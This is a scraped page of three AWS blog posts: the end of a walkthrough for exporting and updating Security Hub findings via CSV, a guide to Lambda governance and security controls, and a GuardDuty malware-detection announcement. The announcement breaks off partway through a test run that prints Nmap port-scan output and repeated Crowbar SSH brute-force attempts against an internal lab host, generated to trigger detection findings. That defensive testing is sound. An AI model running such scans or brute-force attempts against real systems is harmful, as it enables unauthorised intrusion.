To update existing Security Hub findings that you previously exported, you can use the update function CsvUpdater to modify the respective rows and columns of the CSV file you exported, as shown in Figure 2. There are 12 modifiable columns out of 37 (any changes to other columns are ignored), which are described in more detail in Step 3: View or update findings in the CSV file later in this post.

Figure 2: Architecture diagram of the update function

Figure 2 shows the following numbered steps:

Figure 2 shows the following numbered steps:

  1. You download the CSV file that the CsvExporter function generated from the S3 bucket and update as needed.
  2. You upload the CSV file that contains your updates to the S3 bucket.
  3. In the AWS Management Console, you invoke the CsvUpdater Lambda function with a test event containing the URI of the CSV file.
  4. CsvUpdater reads the updated CSV file from the S3 bucket.
  5. CsvUpdater identifies the minimum set of updates and invokes the Security Hub BatchUpdateFindings API action.

Step 1: Use the CloudFormation template to deploy the solution

You can set up and use CSV Manager for Security Hub by using either AWS CloudFormation or the AWS Cloud Development Kit (AWS CDK).

To deploy the solution (AWS CDK)

You can find the latest code in the aws-security-hub-csv-manager GitHub repository, where you can also contribute to the sample code. The following commands show how to deploy the solution by using the AWS CDK. First, the AWS CDK initializes your environment and uploads the AWS Lambda assets to an S3 bucket. Then, you deploy the solution to your account by using the following commands. Replace <INSERT_AWS_ACCOUNT> with your account number, and replace <INSERT_REGION> with the AWS Region that you want the solution deployed to, for example us-east-1.

cdk bootstrap aws://<INSERT_AWS_ACCOUNT>/<INSERT_REGION>
cdk deploy

To deploy the solution (CloudFormation)

  1. Choose the following Launch Stack button to open the AWS CloudFormation console pre-loaded with the template for this solution:

    Launch Stack

  2. In the Parameters section, as shown in Figure 3, enter your values.
    Figure 3: CloudFormation template variables

    Figure 3: CloudFormation template variables

    1. For What folder for CSV Manager for Security Hub Lambda code, leave the default Code. For What folder for CSV Manager for Security Hub exports, leave the default Findings.

      These are the folders within the S3 bucket that the CSV Manager for Security Hub CloudFormation template creates to store the Lambda code, as well as where the findings are exported by the Lambda function.

    2. For Frequency, for this solution you can leave the default value cron(0 8 ? * SUN *). This default causes automatic exports to occur every Sunday at 8:00 AM local time using an EventBridge scheduled rule. For more information about how to update this value to meet your needs, see Schedule Expressions for Rules in the Amazon CloudWatch Events User Guide.
    3. The values you enter for the Regions field depend on whether you have configured an aggregation Region in Security Hub.
      • If you have configured an aggregation Region, enter only that Region code, for example eu-north-1, as shown in Figure 3.
      • If you haven’t configured an aggregation Region, enter a comma-separated list of Regions in which you have enabled Security Hub, for example us-east-1, eu-west-1, eu-west-2.
      • If you would like to export findings from all Regions where Security Hub is enabled, leave the Regions field blank. Regions where Security Hub is not enabled will generate a message and will be skipped.
  3. Choose Next.

The CloudFormation stack deploys the necessary resources, including an EventBridge scheduling rule, AWS System Managers Automation documents, an S3 bucket, and Lambda functions for exporting and updating Security Hub findings.

After you deploy the CloudFormation stack

After you create the CSV Manager for Security Hub stack, you can do the following:

  1. Perform the export function to write some or all Security Hub findings to a CSV file by following the instructions in Step 2: Export Security Hub findings to a CSV file later in this post.
  2. Perform a bulk update of Security Hub findings by following the instructions in Step 3: View or update findings in the CSV file later in this post. You can make changes to one or more of the 12 updatable columns of the CSV file, and perform the update function to update some or all Security Hub findings.

Step 2: Export Security Hub findings to a CSV file

You can export Security Hub findings from the AWS Lambda console. To do this, you create a test event and invoke the CsvExporter Lambda function. CsvExporter exports all Security Hub findings from all applicable Regions to a single CSV file in the S3 bucket for CSV Manager for Security Hub.

To export Security Hub findings to a CSV file

  1. In the AWS Lambda console, find the CsvExporter Lambda function and select it.
  2. On the Code tab, choose the down arrow at the right of the Test button, as shown in Figure 4, and select Configure test event.
    Figure 4: The down arrow at the right of the Test button

    Figure 4: The down arrow at the right of the Test button

  3. To create an empty test event, on the Configure test event page, do the following:
    1. Choose Create a new event.
    2. Enter an event name; in this example we used testEvent.
    3. For Template, leave the default hello-world.
    4. For Event JSON, enter the JSON object {} as shown in Figure 5.
    Figure 5: Creating an empty test event

    Figure 5: Creating an empty test event

  4. Choose Save to save the empty test event.
  5. To invoke the Lambda function, choose the Test button, as shown in Figure 6.
    Figure 6: Test button to invoke the Lambda function

    Figure 6: Test button to invoke the Lambda function

  6. On the Execution Results tab, note the following details, which you will need for the next step.
    {
    "message": "Export succeeded", 
    "bucket": DOC-EXAMPLE-BUCKET,
    "exportKey”: DOC-EXAMPLE-OBJECT,
    "resultCode": 200
    }

  7. Locate the CSV object that matches the value of “exportKey” (in this example, DOC-EXAMPLE-OBJECT) in the S3 bucket that matches the value of “bucket” (in this example, DOC-EXAMPLE-BUCKET).

Now you can view or update the findings in the CSV file, as described in the next section.

Step 3: (Optional) Using filters to limit CSV results

In your test event, you can specify any filter that is accepted by the GetFindings API action. You do this by adding a filter key to your test event. The filter key can either contain the word HighActive (which is a predefined filter configured as a default for selecting active high-severity and critical findings, as shown in Figure 8), or a JSON filter object.

Figure 8 depicts an example JSON filter that performs the same filtering as the HighActive predefined filter.

To use filters to limit CSV results

  1. In the AWS Lambda console, find the CsvExporter Lambda function and select it.
  2. On the Code tab, choose the down arrow at the right of the Test button, as shown in Figure 7, and select Configure test event.
    Figure 7: The down arrow at the right of the Test button

    Figure 7: The down arrow at the right of the Test button

  3. To create a test event containing a filter, on the Configure test event page, do the following:
    1. Choose Create a new event.
    2. Enter an event name; in this example we used filterEvent.
    3. For Template, select testEvent,
    4. For Event JSON, enter the following JSON object, as shown in Figure 8.
      {
         "SeverityLabel":[
            {
               "Value":"CRITICAL",
               "Comparison":"EQUALS"
            },
            {
               "Value":"HIGH",
               "Comparison":"EQUALS"
            }
         ],
         "RecordState":[
            {
               "Comparison":"EQUALS",
               "Value":"ACTIVE"
            }
         ]
      }

      Figure 8: Test button to invoke the Lambda function

      Figure 8: Test button to invoke the Lambda function

    5. Choose Save.
  4. To invoke the Lambda function, choose the Test button as shown in Figure 9.
    Figure 9: Test button to invoke the Lambda function

    Figure 9: Test button to invoke the Lambda function

  5. On the Execution Results tab, note the following details, which you will need for the next step.
    {
    "message": "Export succeeded", 
    "bucket": DOC-EXAMPLE-BUCKET,
    "exportKey": DOC-EXAMPLE-OBJECT,
    "resultCode": 200
    }

  6. Locate the CSV object that matches the value of “exportKey” (in this example, DOC-EXAMPLE-OBJECT) in the S3 bucket that matches the value of “bucket” (in this example, DOC-EXAMPLE-BUCKET).

The results in this CSV file should be a filtered set of Security Hub findings according to the filter you specified above. You can now proceed to step 4 if you want to view or update findings.

Step 4: View or update findings in the CSV file

You can use any program that allows you to view or edit CSV files, such as Microsoft Excel. The first row in the CSV file are the column names. These column names correspond to fields in the JSON objects that are returned by the GetFindings API action.

Warning: Do not modify the first two columns, Id (column A) or ProductArn (column B). If you modify these columns, Security Hub will not be able to locate the finding to update, and any other changes to that finding will be discarded.

You can locally modify any of the columns in the CSV file, but only 12 columns out of 37 columns will actually be updated if you use CsvUpdater to update Security Hub findings. The following are the 12 columns you can update. These correspond to columns C through N in the CSV file.

Column name Spreadsheet column Description
Criticality C An integer value between 0 and 100.
Confidence D An integer value between 0 and 100.
NoteText E Any text you wish
NoteUpdatedBy F Automatically updated with your AWS principal user ID.
CustomerOwner* G Information identifying the owner of this finding (for example, email address).
CustomerIssue* H A Jira issue or another identifier tracking a specific issue.
CustomerTicket* I A ticket number or other trouble/problem tracking identification.
ProductSeverity** J A floating-point number from 0.0 to 99.9.
NormalizedSeverity** K An integer between 0 and 100.
SeverityLabel L One of the following:

  • INFORMATIONAL
  • LOW
  • MEDIUM
  • HIGH
  • HIGH
  • CRITICAL
VerificationState M One of the following:

  • UNKNOWN — Finding has not been verified yet.
  • TRUE_POSITIVE — This is a valid finding and should be treated as a risk.
  • FALSE_POSITIVE — This an incorrect finding and should be ignored or suppressed.
  • BENIGN_POSITIVE — This is a valid finding, but the risk is not applicable or has been accepted, transferred, or mitigated.
Workflow N One of the following:

  • NEW — This is a new finding that has not been reviewed.
  • NOTIFIED — The responsible party or parties have been notified of this finding.
  • RESOLVED — The finding has been resolved.
  • SUPPRESSED — A false or benign finding has been suppressed so that it does not appear as a current finding in Security Hub.

* These columns are stored inside the UserDefinedFields field of the updated findings. The column names imply a certain kind of information, but you can put any information you wish.

** These columns are stored inside the Severity field of the updated findings. These values have a fixed format and will be rejected if they do not meet that format.

Columns with fixed text values (L, M, N) in the previous table can be specified in mixed case and without underscores—they will be converted to all uppercase and underscores added in the CsvUpdater Lambda function. For example, “false positive” will be converted to “FALSE_POSITIVE”.

Step 5: Create a test event and update Security Hub by using the CSV file

If you want to update Security Hub findings, make your changes to columns C through N as described in the previous table. After you make your changes in the CSV file, you can update the findings in Security Hub by using the CSV file and the CsvUpdater Lambda function.

Use the following procedure to create a test event and run the CsvUpdater Lambda function.

To create a test event and run the CsvUpdater Lambda function

  1. In the AWS Lambda console, find the CsvUpdater Lambda function and select it.
  2. On the Code tab, choose the down arrow to the right of the Test button, as shown in Figure 10, and select Configure test event.
    Figure 10: The down arrow to the right of the Test button

    Figure 10: The down arrow to the right of the Test button

  3. To create a test event as shown in Figure 11, on the Configure test event page, do the following:
    1. Choose Create a new event.
    2. Enter an event name; in this example we used testEvent.
    3. For Template, leave the default hello-world.
    4. For Event JSON, enter the following:
      {
      "input": <s3ObjectUri>,
      "primaryRegion": <aggregationRegionName>
      }

      Replace <s3ObjectUri> with the full URI of the S3 object where the updated CSV file is located.

      Replace <aggregationRegionName> with your Security Hub aggregation Region, or the primary Region in which you initially enabled Security Hub.

      Figure 11: Create and save a test event for the CsvUpdater Lambda function

      Figure 11: Create and save a test event for the CsvUpdater Lambda function

  4. Choose Save.
  5. Choose the Test button, as shown in Figure 12, to invoke the Lambda function.
    Figure 12: Test button to invoke the Lambda function

    Figure 12: Test button to invoke the Lambda function

  6. To verify that the Lambda function ran successfully, on the Execution Results tab, review the results for “message”: “Success”, as shown in the following example. Note that the results may be thousands of lines long.
    {
    "message": "Success",
    "details": {
    "processed": [{"Id": arn:aws:securityhub:us-east-1: 111122223333:subscription/cis-aws-foundations-benchmark/v/1.2.0/1.7/finding/6d543b22-6a3d-405c-ae7f-224469bde7d2, "ProductArn": arn:aws:securityhub:us-east-1::product/aws/securityhub}, … ],
    "unprocessed": [],
    "message": "Updated succeeded",
    "success": true
    },
    "input": s3://DOC-EXAMPLE-BUCKET/DOC-EXAMPLE-OBJECT,
    "resultCode": 200
    }

    The processed array lists every successfully updated finding by Id and ProductArn.

    If any of the findings were not successfully updated, their Id and ProductArn appear in the unprocessed array. In the previous example, no findings were unprocessed.

    The value s3://DOC-EXAMPLE-BUCKET/DOC-EXAMPLE-OBJECT is the URI of the S3 object from which your updates were read.

Cleaning up

To avoid incurring future charges, first delete the CloudFormation stack that you deployed in Step 1: Use the CloudFormation template to deploy the solution. Next, you need to manually delete the S3 bucket deployed with the stack. For instructions, see Deleting a bucket in the Amazon Simple Storage Service User Guide.

Conclusion

In this post, we showed you how you can export Security Hub findings to a CSV file in an S3 bucket and update the exported findings by using CSV Manager for Security Hub. We showed you how you can automate this process by using AWS Lambda, Amazon S3, and AWS Systems Manager. Full documentation for CSV Manager for Security Hub is available in the aws-security-hub-csv-manager GitHub repository. You can also investigate other ways to manage Security Hub findings by checking out our blog posts about Security Hub integration with Amazon OpenSearch Service, Amazon QuickSight, Slack, PagerDuty, Jira, or ServiceNow.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Security Hub re:Post. To learn more or get started, visit AWS Security Hub.

Want more AWS Security news? Follow us on Twitter.

Andy Robinson

Andy Robinson

Andy wrote CSV Manager for Security Hub in response to requests from several customers. He is an AWS Professional Services Senior Security Consultant with over 30 years of security, software product management, and software design experience. Andy is also a pilot, scuba instructor, martial arts instructor, ham radio enthusiast, and photographer.

Murat Eksi

Murat Eksi

Murat is a full-stack technologist at AWS Professional Services. He has worked with various industries, including finance, sports, media, gaming, manufacturing, and automotive, to accelerate their business outcomes through application development, security, IoT, analytics, devops and infrastructure. Outside of work, he loves traveling around the world, learning new languages while setting up local events for entrepreneurs and business owners in Stockholm, or taking flight lessons.

Shikhar Mishra

Shikhar Mishra

Shikhar is a Senior Solutions Architect at Amazon Web Services. He is a cloud security enthusiast and enjoys helping customers design secure, reliable, and cost-effective solutions on AWS.

Rohan Raizada

Rohan Raizada

Rohan is a Solutions Architect for Amazon Web Services. He works with enterprises of all sizes with their cloud adoption to build scalable and secure solutions using AWS. During his free time, he likes to spend time with family and go cycling outdoors.

Jonathan Nguyen

Jonathan Nguyen

Jonathan is a Shared Delivery Team Senior Security Consultant at AWS. His background is in AWS Security with a focus on threat detection and incident response. Today, he helps enterprise customers develop a comprehensive security strategy and deploy security solutions at scale, and he trains customers on AWS Security best practices.

Building AWS Lambda governance and guardrails

Post Syndicated from Julian Wood original https://aws.amazon.com/blogs/compute/building-aws-lambda-governance-and-guardrails/

When building serverless applications using AWS Lambda, there are a number of considerations regarding security, governance, and compliance. This post highlights how Lambda, as a serverless service, simplifies cloud security and compliance so you can concentrate on your business logic. It covers controls that you can implement for your Lambda workloads to ensure that your applications conform to your organizational requirements.

The Shared Responsibility Model

The AWS Shared Responsibility Model distinguishes between what AWS is responsible for and what customers are responsible for with cloud workloads. AWS is responsible for “Security of the Cloud” where AWS protects the infrastructure that runs all the services offered in the AWS Cloud. Customers are responsible for “Security in the Cloud”, managing and securing their workloads. When building traditional applications, you take on responsibility for many infrastructure services, including operating systems and network configuration.

Traditional application shared responsibility

Traditional application shared responsibility

One major benefit when building serverless applications is shifting more responsibility to AWS so you can concentrate on your business applications. AWS handles managing and patching the underlying servers, operating systems, and networking as part of running the services.

Serverless application shared responsibility

Serverless application shared responsibility

For Lambda, AWS manages the application platform where your code runs, which includes patching and updating the managed language runtimes. This reduces the attack surface while making cloud security simpler. You are responsible for the security of your code and AWS Identity and Access Management (IAM) to the Lambda service and within your function.

Lambda is SOCHIPAAPCI, and ISO-compliant. For more information, see Compliance validation for AWS Lambda and the latest Lambda certification and compliance readiness services in scope.

Lambda isolation

Lambda functions run in separate isolated AWS accounts that are dedicated to the Lambda service. Lambda invokes your code in a secure and isolated runtime environment within the Lambda service account. A runtime environment is a collection of resources running in a dedicated hardware-virtualized Micro Virtual Machines (MVM) on a Lambda worker node.

Lambda workers are bare metalEC2 Nitro instances, which are managed and patched by the Lambda service team. They have a maximum lease lifetime of 14 hours to keep the underlying infrastructure secure and fresh. MVMs are created by Firecracker, an open source virtual machine monitor (VMM) that uses Linux’s Kernel-based Virtual Machine (KVM) to create and manage MVMs securely at scale.

MVMs maintain a strong separation between runtime environments at the virtual machine hardware level, which increases security. Runtime environments are never reused across functions, function versions, or AWS accounts.

Isolation model for AWS Lambda workers

Isolation model for AWS Lambda workers

Network security

Lambda functions always run inside secure Amazon Virtual Private Cloud (Amazon VPCs) owned by the Lambda service. This gives the Lambda function access to AWS services and the public internet. There is no direct network inbound access to Lambda workers, runtime environments, or Lambda functions. All inbound access to a Lambda function only comes via the Lambda Invoke API, which sends the event object to the function handler.

You can configure a Lambda function to connect to private subnets in a VPC in your account if necessary, which you can control with IAM condition keys . The Lambda function still runs inside the Lambda service VPC but sends all network traffic through your VPC. Function outbound traffic comes from your own network address space.

AWS Lambda service VPC with VPC-to-VPC NAT to customer VPC

AWS Lambda service VPC with VPC-to-VPC NAT to customer VPC

To give your VPC-connected function access to the internet, route outbound traffic to a NAT gateway in a public subnet. Connecting a function to a public subnet doesn’t give it internet access or a public IP address, as the function is still running in the Lambda service VPC and then routing network traffic into your VPC.

All internal AWS traffic uses the AWS Global Backbone rather than traversing the internet. You do not need to connect your functions to a VPC to avoid connectivity to AWS services over the internet. VPC connected functions allow you to control and audit outbound network access.

You can use security groups to control outbound traffic for VPC-connected functions and network ACLs to block access to CIDR IP ranges or ports. VPC endpoints allow you to enable private communications with supported AWS services without internet access.

You can use VPC Flow Logs to audit traffic going to and from network interfaces in your VPC.

Runtime environment re-use

Each runtime environment processes a single request at a time. After Lambda finishes processing the request, the runtime environment is ready to process an additional request for the same function version. For more information on how Lambda manages runtime environments, see Understanding AWS Lambda scaling and throughput.

Data can persist in the local temporary filesystem path, in globally scoped variables, and in environment variables across subsequent invocations of the same function version. Ensure that you only handle sensitive information within individual invocations of the function by processing it in the function handler, or using local variables. Do not re-use files in the local temporary filesystem to process unencrypted sensitive data. Do not put sensitive or confidential information into Lambda environment variables, tags, or other freeform fields such as Name fields.

For more Lambda security information, see the Lambda security whitepaper.

Multiple accounts

AWS recommends using multiple accounts to isolate your resources because they provide natural boundaries for security, access, and billing. Use AWS Organizations to manage and govern individual member accounts centrally. You can use AWS Control Tower to automate many of the account build steps and apply managed guardrails to govern your environment. These include preventative guardrails to limit actions and detective guardrails to detect and alert on non-compliance resources for remediation.

Lambda access controls

Lambda permissions define what a Lambda function can do, and who or what can invoke the function. Consider the following areas when applying access controls to your Lambda functions to ensure least privilege:

Execution role

Lambda functions have permission to access other AWS resources using execution roles. This is an AWS principal that the Lambda service assumes which grants permissions using identity policy statements assigned to the role. The Lambda service uses this role to fetch and cache temporary security credentials, which are then available as environment variables during a function’s invocation. It may re-use them across different runtime environments that use the same execution role.

Ensure that each function has its own unique role with the minimum set of permissions..

Identity/user policies

IAM identity policies are attached to IAM users, groups, or roles. These policies allow users or callers to perform operations on Lambda functions. You can restrict who can create functions, or control what functions particular users can manage.

Resource policies

Resource policies define what identities have fine-grained inbound access to managed services. For example, you can restrict which Lambda function versions can add events to a specific Amazon EventBridge event bus. You can use resource-based policies on Lambda resources to control what AWS IAM identities and event sources can invoke a specific version or alias of your function. You also use a resource-based policy to allow an AWS service to invoke your function on your behalf. To see which services support resource-based policies, see “AWS services that work with IAM”.

Attribute-based access control (ABAC)

With attribute-based access control (ABAC), you can use tags to control access to your Lambda functions. With ABAC, you can scale an access control strategy by setting granular permissions with tags without requiring permissions updates for every new user or resource as your organization scales. You can also use tag policies with AWS Organizations to standardize tags across resources.

Permissions boundaries

Permissions boundaries are a way to delegate permission management safely. The boundary places a limit on the maximum permissions that a policy can grant. For example, you can use boundary permissions to limit the scope of the execution role to allow only read access to databases. A builder with permission to manage a function or with write access to the applications code repository cannot escalate the permissions beyond the boundary to allow write access.

Service control policies

When using AWS Organizations, you can use Service control policies (SCPs) to manage permissions in your organization. These provide guardrails for what actions IAM users and roles within the organization root or OUs can do. For more information, see the AWS Organizations documentation, which includes example service control policies.

Code signing

As you are responsible for the code that runs in your Lambda functions, you can ensure that only trusted code runs by using code signing with the AWS Signer service. AWS Signer digitally signs your code packages and Lambda validates the code package before accepting the deployment, which can be part of your automated software deployment process.

Auditing Lambda configuration, permissions and access

You should audit access and permissions regularly to ensure that your workloads are secure. Use the IAM console to view when an IAM role was last used.

IAM last used

IAM last used

IAM access advisor

Use IAM access advisor on the Access Advisor tab in the IAM console to review when was the last time an AWS service was used from a specific IAM user or role. You can use this to remove IAM policies and access from your IAM roles.

IAM access advisor

IAM access advisor

AWS CloudTrail

AWS CloudTrail helps you monitor, log, and retain account activity to provide a complete event history of actions across your AWS infrastructure. You can monitor Lambda API actions to ensure that only appropriate actions are made against your Lambda functions. These include CreateFunction, DeleteFunction, CreateEventSourceMapping, AddPermission, UpdateEventSourceMapping,  UpdateFunctionConfiguration, and UpdateFunctionCode.

AWS CloudTrail

AWS CloudTrail

IAM Access Analyzer

You can validate policies using IAM Access Analyzer, which provides over 100 policy checks with security warnings for overly permissive policies. To learn more about policy checks provided by IAM Access Analyzer, see “IAM Access Analyzer policy validation”.

You can also generate IAM policies based on access activity from CloudTrail logs, which contain the permissions that the role used in your specified date range.

IAM Access Analyzer

IAM Access Analyzer

AWS Config

AWS Config provides you with a record of the configuration history of your AWS resources. AWS Config monitors the resource configuration and includes rules to alert when they fall into a non-compliant state.

For Lambda, you can track and alert on changes to your function configuration, along with the IAM execution role. This allows you to gather Lambda function lifecycle data for potential audit and compliance requirements. For more information, see the Lambda Operators Guide.

AWS Config includes Lambda managed config rules such as lambda-concurrency-check, lambda-dlq-check, lambda-function-public-access-prohibited, lambda-function-settings-check, and lambda-inside-vpc. You can also write your own rules.

There are a number of other AWS services to help with security compliance.

  1. AWS Audit Manager: Collect evidence to help you audit your use of cloud services.
  2. Amazon GuardDuty: Detect unexpected and potentially unauthorized activity in your AWS environment.
  3. Amazon Macie: Evaluates your content to identify business-critical or potentially confidential data.
  4. AWS Trusted Advisor: Identify opportunities to improve stability, save money, or help close security gaps.
  5. AWS Security Hub: Provides security checks and recommendations across your organization.

Conclusion

Lambda makes cloud security simpler by taking on more responsibility using the AWS Shared Responsibility Model. Lambda implements strict workload security at scale to isolate your code and prevent network intrusion to your functions. This post provides guidance on assessing and implementing best practices and tools for Lambda to improve your security, governance, and compliance controls. These include permissions, access controls, multiple accounts, and code security. Learn how to audit your function permissions, configuration, and access to ensure that your applications conform to your organizational requirements.

For more serverless learning resources, visit Serverless Land.

New for Amazon GuardDuty – Malware Detection for Amazon EBS Volumes

Post Syndicated from Danilo Poccia original https://aws.amazon.com/blogs/aws/new-for-amazon-guardduty-malware-detection-for-amazon-ebs-volumes/

With Amazon GuardDuty, you can monitor your AWS accounts and workloads to detect malicious activity. Today, we are adding to GuardDuty the capability to detect malware. Malware is malicious software that is used to compromise workloads, repurpose resources, or gain unauthorized access to data. When you have GuardDuty Malware Protection enabled, a malware scan is initiated when GuardDuty detects that one of your EC2 instances or container workloads running on EC2 is doing something suspicious. For example, a malware scan is triggered when an EC2 instance is communicating with a command-and-control server that is known to be malicious or is performing denial of service (DoS) or brute-force attacks against other EC2 instances.

GuardDuty supports many file system types and scans file formats known to be used to spread or contain malware, including Windows and Linux executables, PDF files, archives, binaries, scripts, installers, email databases, and plain emails.

When potential malware is identified, actionable security findings are generated with information such as the threat and file name, the file path, the EC2 instance ID, resource tags and, in the case of containers, the container ID and the container image used. GuardDuty supports container workloads running on EC2, including customer-managed Kubernetes clusters or individual Docker containers. If the container is managed by Amazon Elastic Kubernetes Service (EKS) or Amazon Elastic Container Service (Amazon ECS), the findings also include the cluster name and the task or pod ID so application and security teams can quickly find the affected container resources.

As with all other GuardDuty findings, malware detections are sent to the GuardDuty console, pushed through Amazon EventBridge, routed to AWS Security Hub, and made available in Amazon Detective for incident investigation.

How GuardDuty Malware Protection Works
When you enable malware protection, you set up an AWS Identity and Access Management (IAM) service-linked role that grants GuardDuty permissions to perform malware scans. When a malware scan is initiated for an EC2 instance, GuardDuty Malware Protection uses those permissions to take a snapshot of the attached Amazon Elastic Block Store (EBS) volumes that are less than 1 TB in size and then restore the EBS volumes in an AWS service account in the same AWS Region to scan them for malware. You can use tagging to include or exclude EC2 instances from those permissions and from scanning. In this way, you don’t need to deploy security software or agents to monitor for malware, and scanning the volumes doesn’t impact running workloads. The EBS volumes in the service account and the snapshots in your account are deleted after the scan. Optionally, you can preserve the snapshots when malware is detected.

The service-linked role grants GuardDuty access to AWS Key Management Service (AWS KMS) keys used to encrypt EBS volumes. If the EBS volumes attached to a potentially compromised EC2 instance are encrypted with a customer-managed key, GuardDuty Malware Protection uses the same key to encrypt the replica EBS volumes as well. If the volumes are not encrypted, GuardDuty uses its own key to encrypt the replica EBS volumes and ensure privacy. Volumes encrypted with EBS-managed keys are not supported.

Security in cloud is a shared responsibility between you and AWS. As a guardrail, the service-linked role used by GuardDuty Malware Protection cannot perform any operation on your resources (such as EBS snapshots and volumes, EC2 instances, and KMS keys) if it has the GuardDutyExcluded tag. Once you mark your snapshots with GuardDutyExcluded set to true, the GuardDuty service won’t be able to access these snapshots. The GuardDutyExcluded tag supersedes any inclusion tag. Permissions also restrict how GuardDuty can modify your snapshot so that they cannot be made public while shared with the GuardDuty service account.

The EBS volumes created by GuardDuty are always encrypted. GuardDuty can use KMS keys only on EBS snapshots that have a GuardDuty scan ID tag. The scan ID tag is added by GuardDuty when snapshots are created after an EC2 finding. The KMS keys that are shared with GuardDuty service account cannot be invoked from any other context except the Amazon EBS service. Once the scan completes successfully, the KMS key grant is revoked and the volume replica in GuardDuty service account is deleted, making sure GuardDuty service cannot access your data after completing the scan operation.

Enabling Malware Protection for an AWS Account
If you’re not using GuardDuty yet, Malware Protection is enabled by default when you activate GuardDuty for your account. Because I am already using GuardDuty, I need to enable Malware Protection from the console. If you’re using AWS Organizations, your delegated administrator accounts can enable this for existing member accounts and configure if new AWS accounts in the organization should be automatically enrolled.

In the GuardDuty console, I choose Malware Protection under Settings in the navigation pane. There, I choose Enable and then Enable Malware Protection.

Console screenshot.

Snapshots are automatically deleted after they are scanned. In General settings, I have the option to retain in my AWS account the snapshots where malware is detected and have them available for further analysis.

Console screenshot.

In Scan options, I can configure a list of inclusion tags, so that only EC2 instances with those tags are scanned, or exclusion tags, so that EC2 instances with tags in the list are skipped.

Console screenshot.

Testing Malware Protection GuardDuty Findings
To generate several Amazon GuardDuty findings, including the new Malware Protection findings, I clone the Amazon GuardDuty Tester repo:

$ git clone https://github.com/awslabs/amazon-guardduty-tester

First, I create an AWS CloudFormation stack using the guardduty-tester.template file. When the stack is ready, I follow the instructions to configure my SSH client to log in to the tester instance through the bastion host. Then, I connect to the tester instance:

$ ssh tester

From the tester instance, I start the guardduty_tester.sh script to generate the findings:

$ ./guardduty_tester.sh 

***********************************************************************
* Test #1 - Internal port scanning                                    *
* This simulates internal reconaissance by an internal actor or an   *
* external actor after an initial compromise. This is considered a    *
* low priority finding for GuardDuty because its not a clear indicator*
* of malicious intent on its own.                                     *
***********************************************************************


Starting Nmap 6.40 ( http://nmap.org ) at 2022-05-19 09:36 UTC
Nmap scan report for ip-172-16-0-20.us-west-2.compute.internal (172.16.0.20)
Host is up (0.00032s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
80/tcp   closed http
5050/tcp closed mmcc
MAC Address: 06:25:CB:F4:E0:51 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 4.96 seconds

-----------------------------------------------------------------------

***********************************************************************
* Test #2 - SSH Brute Force with Compromised Keys                     *
* This simulates an SSH brute force attack on an SSH port that we    *
* can access from this instance. It uses (phony) compromised keys in  *
* many subsequent attempts to see if one works. This is a common      *
* techique where the bad actors will harvest keys from the web in     *
* places like source code repositories where people accidentally leave*
* keys and credentials (This attempt will not actually succeed in     *
* obtaining access to the target linux instance in this subnet)       *
***********************************************************************

2022-05-19 09:36:29 START
2022-05-19 09:36:29 Crowbar v0.4.3-dev
2022-05-19 09:36:29 Trying 172.16.0.20:22
2022-05-19 09:36:33 STOP
2022-05-19 09:36:33 No results found...
2022-05-19 09:36:33 START
2022-05-19 09:36:33 Crowbar v0.4.3-dev
2022-05-19 09:36:33 Trying 172.16.0.20:22
2022-05-19 09:36:37 STOP
2022-05-19 09:36:37 No results found...
2022-05-19 09:36:37 START
2022-05-19 09:36:37 Crowbar v0.4.3-dev
2022-05-19 09:36:37 Trying 172.16.0.20:22
2022-05-19 09:36:41 STOP
2022-05-19 09:36:41 No results found...
2022-05-19 09:36:41 START
2022-05-19 09:36:41 Crowbar v0.4.3-dev
2022-05-19 09:36:41 Trying 172.16.0.20:22
2022-05-19 09:36:45 STOP
2022-05-19 09:36:45 No results found...
2022-05-19 09:36:45 START
2022-05-19 09:36:45 Crowbar v0.4.3-dev
2022-05-19 09:36:45 Trying 172.16.0.20:22
2022-05-19 09:36:48 STOP
2022-05-19 09:36:48 No results found...
2022-05-19 09:36:49 START
2022-05-19 09:36:49 Crowbar v0.4.3-dev
2022-05-19 09:36:49 Trying 172.16.0.20:22
2022-05-19 09:36:52 STOP
2022-05-19 09:36:52 No results found...
2022-05-19 09:36:52 START
2022-05-19 09:36:52 Crowbar v0.4.3-dev
2022-05-19 09:36:52 Trying 172.16.0.20:22
2022-05-19 09:36:56 STOP
2022-05-19 09:36:56 No results found...
2022-05-19 09:36:56 START
2022-05-19 09:36:56 Crowbar v0.4.3-dev
2022-05-19 09:36:56 Trying 172.16.0.20:22
2022-05-19 09:37:00 STOP
2022-05-19 09:37:00 No results found...
2022-05-19 09:37:00 START
2022-05-19 09:37:00 Crowbar v0.4.3-dev
2022-05-19 09:37:00 Trying 172.16.0.20:22
2022-05-19 09:37:04 STOP
2022-05-19 09:37:04 No results found...
2022-05-19 09:37:04 START
2022-05-19 09:37:04 Crowbar v0.4.3-dev
2022-05-19 09:37:04 Trying 172.16.0.20:22
2022-05-19 09:37:08 STOP
2022-05-19 09:37:08 No results found...
2022-05-19 09:37:08 START
2022-05-19 09:37:08 Crowbar v0.4.3-dev
2022-05-19 09:37:08 Trying 172.16.0.20:22
2022-05-19 09:37:12 STOP
2022-05-19 09:37:12 No results found...
2022-05-19 09:37:12 START
2022-05-19 09:37:12 Crowbar v0.4.3-dev
2022-05-19 09:37:12 Trying 172.16.0.20:22
2022-05-19 09:37:16 STOP
2022-05-19 09:37:16 No results found...
2022-05-19 09:37:16 START
2022-05-19 09:37:16 Crowbar v0.4.3-dev
2022-05-19 09:37:16 Trying 172.16.0.20:22
2022-05-19 09:37:20 STOP
2022-05-19 09:37:20 No results found...
2022-05-19 09:37:20 START
2022-05-19 09:37:20 Crowbar v0.4.3-dev
2022-05-19 09:37:20 Trying 172.16.0.20:22
2022-05-19 09:37:23 STOP
2022-05-19 09:37:23 No results found...
2022-05-19 09:37:23 START
2022-05-19 09:37:23 Crowbar v0.4.3-dev
2022-05-19 09:37:23 Trying 172.16.0.20:22
2022-05-19 09:37:27 STOP
2022-05-19 09:37:27 No results found...
2022-05-19 09:37:27 START
2022-05-19 09:37:27 Crowbar v0.4.3-dev
2022-05-19 09:37:27 Trying 172.16.0.20:22
2022-05-19 09:37:31 STOP
2022-05-19 09:37:31 No results found...
2022-05-19 09:37:31 START
2022-05-19 09:37:31 Crowbar v0.4.3-dev
2022-05-19 09:37:31 Trying 172.16.0.20:22
2022-05-19 09:37:34 STOP
2022-05-19 09:37:34 No results found...
2022-05-19 09:37:35 START
2022-05-19 09:37:35 Crowbar v0.4.3-dev
